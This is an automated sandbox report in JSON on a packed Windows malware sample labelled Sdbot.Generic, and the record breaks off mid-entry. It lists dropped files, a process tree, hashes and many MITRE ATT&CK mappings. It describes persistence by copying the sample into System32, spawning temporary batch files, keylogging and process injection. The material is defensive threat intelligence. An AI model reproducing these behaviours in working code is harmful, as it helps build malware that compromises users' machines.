{"size": 660222, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214", "sha256": "82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214", "av_detect": 87, "vx_family": "Sdbot.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 5, "total_signatures": 204, "extracted_files": [{"name": "r2564.bat", "file_path": "%TEMP%\\r2564.bat", "file_size": 122, "sha256": "eb36ed96c143ed96ebc6cc3deb064136d21d32b6456c5366d1a67cb970b9a006", "type_tags": ["text"], "description": "DOS batch file, ASCII text, with CRLF line terminators", "runtime_process": "vxdmon.exe (PID: 6064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "r2845.bat", "file_path": "%TEMP%\\r2845.bat", "file_size": 238, "sha256": "80ef807d8139d1baad766a86793bbe2d97734a3b1b926620b8154439275de693", "type_tags": ["text"], "description": "DOS batch file, ASCII text, with CRLF line terminators", "runtime_process": "82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe (PID: 6060)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vxdmon.exe", "file_path": "%WINDIR%\\System32\\vxdmon.exe", "file_size": 700232, "sha256": "1d839fdd70dced7e004e002384f0da171d2d530e28f2d1f6277e4847d7440987", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "vxdmon.exe (PID: 6064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vxdmon.exe", "file_path": "C:\\vxdmon.exe", "file_size": 683825, "sha256": "4dac828932ae005d6d9a8acf98e35c1829161f3dbff85f1b7e8990aa19480011", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "vxdmon.exe (PID: 6064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "VXDMON.EXE.67A9C45E.bin", "file_size": 700232, "sha256": "1d839fdd70dced7e004e002384f0da171d2d530e28f2d1f6277e4847d7440987", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00006060", "name": "82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe", "normalized_path": "C:\\82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe", "sha256": "82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214", "av_label": "Generic.Sdbot", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00006064", "parentuid": "00000000-00006060", "name": "vxdmon.exe", "normalized_path": "C:\\vxdmon.exe", "command_line": "\\vxdmon.exe", "sha256": "4dac828932ae005d6d9a8acf98e35c1829161f3dbff85f1b7e8990aa19480011"}, {"uid": "00000000-00006048", "parentuid": "00000000-00006064", "name": "vxdmon.exe", "normalized_path": "%WINDIR%\\system32\\vxdmon.exe", "sha256": "1d839fdd70dced7e004e002384f0da171d2d530e28f2d1f6277e4847d7440987"}, {"uid": "00000000-00004232", "parentuid": "00000000-00006064", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\r2564.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004016", "parentuid": "00000000-00006060", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\r2845.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 2, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Clear Windows Event Logs", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 4, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 17}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 4, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 3}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2845.bat\"\n \"vxdmon.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2564.bat\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"CopyFileA\" to copy C:\\82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe to new location \\vxdmon.exe (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"CopyFileA\" to copy C:\\vxdmon.exe to new location %WINDIR%\\system32\\vxdmon.exe (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Aeb-75\"\n 